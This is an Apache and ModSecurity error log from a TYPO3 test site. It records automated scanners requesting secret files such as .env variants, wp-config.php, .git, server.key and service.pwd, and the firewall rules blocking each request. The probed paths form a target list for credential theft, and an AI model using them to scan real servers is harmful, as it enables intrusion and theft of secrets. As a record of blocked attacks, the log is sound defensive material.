[Fri May 23 23:43:26.141804 2025] [:error] [pid 3348266] [client 213.232.87.230:36897] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "aDDr_sCfAEoI969JbKcJQAAAAAs"]
[Fri May 23 23:43:26.203299 2025] [authz_core:error] [pid 3348127] [client 213.232.87.230:33059] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri May 23 23:43:26.244012 2025] [:error] [pid 3351872] [client 213.232.87.230:18679] [client 213.232.87.230] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDDr_pk7Vk06-GcnxMuGZAAAAAM"]
[Fri May 23 23:43:26.244239 2025] [:error] [pid 3351872] [client 213.232.87.230:18679] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDDr_pk7Vk06-GcnxMuGZAAAAAM"]
[Fri May 23 23:43:26.244406 2025] [:error] [pid 3351872] [client 213.232.87.230:18679] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aDDr_pk7Vk06-GcnxMuGZAAAAAM"]
[Fri May 23 23:43:26.277766 2025] [:error] [pid 3358370] [client 213.232.87.230:61641] [client 213.232.87.230] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aDDr_joTOrCbKT6WYaklkwAAAAY"]
[Fri May 23 23:43:26.278068 2025] [:error] [pid 3358370] [client 213.232.87.230:61641] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aDDr_joTOrCbKT6WYaklkwAAAAY"]
[Fri May 23 23:43:26.278276 2025] [:error] [pid 3358370] [client 213.232.87.230:61641] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aDDr_joTOrCbKT6WYaklkwAAAAY"]
[Fri May 23 23:43:26.400849 2025] [:error] [pid 3348130] [client 213.232.87.230:51347] [client 213.232.87.230] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aDDr_nSAf3WJyka2P1glNwAAAAg"]
[Fri May 23 23:43:26.401165 2025] [:error] [pid 3348130] [client 213.232.87.230:51347] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aDDr_nSAf3WJyka2P1glNwAAAAg"]
[Fri May 23 23:43:26.401321 2025] [:error] [pid 3348130] [client 213.232.87.230:51347] [client 213.232.87.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "aDDr_nSAf3WJyka2P1glNwAAAAg"]
[Fri May 23 23:43:26.492470 2025] [authz_core:error] [pid 3367224] [client 213.232.87.230:52729] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat May 24 04:35:53.157511 2025] [authz_core:error] [pid 3369835] [client 93.123.109.105:50128] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat May 24 13:40:54.793245 2025] [authz_core:error] [pid 3374160] [client 45.144.212.129:48406] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat May 24 14:06:09.463063 2025] [authz_core:error] [pid 3369845] [client 45.144.212.129:53862] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon May 26 22:42:43.146355 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3AAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.147653 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3AAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.147835 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3AAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.474780 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3QAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.475066 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3QAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.475261 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aDTSQ1NfyYOYBczX3ejM3QAAAAo"], referer: http://surf.test.indacotrentino.com/.env
[Mon May 26 22:42:43.903481 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist, referer: http://surf.test.indacotrentino.com/.env.dist
[Mon May 26 22:42:44.230405 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist, referer: http://surf.test.indacotrentino.com/.env.dist
[Mon May 26 22:42:44.659236 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak, referer: http://surf.test.indacotrentino.com/.env.bak
[Mon May 26 22:42:44.986297 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak, referer: http://surf.test.indacotrentino.com/.env.bak
[Mon May 26 22:42:45.415262 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:45.415575 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:45.415783 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:45.742625 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:45.742922 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:45.743141 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aDTSRVNfyYOYBczX3ejM4wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.dev.local
[Mon May 26 22:42:46.171518 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.171786 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.172051 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.499120 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.499392 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.499584 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Mon May 26 22:42:46.927913 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:46.928189 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:46.928414 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSRlNfyYOYBczX3ejM5gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:47.255501 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSR1NfyYOYBczX3ejM5wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:47.255785 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSR1NfyYOYBczX3ejM5wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:47.255990 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDTSR1NfyYOYBczX3ejM5wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Mon May 26 22:42:47.683655 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDTSR1NfyYOYBczX3ejM6AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production.local
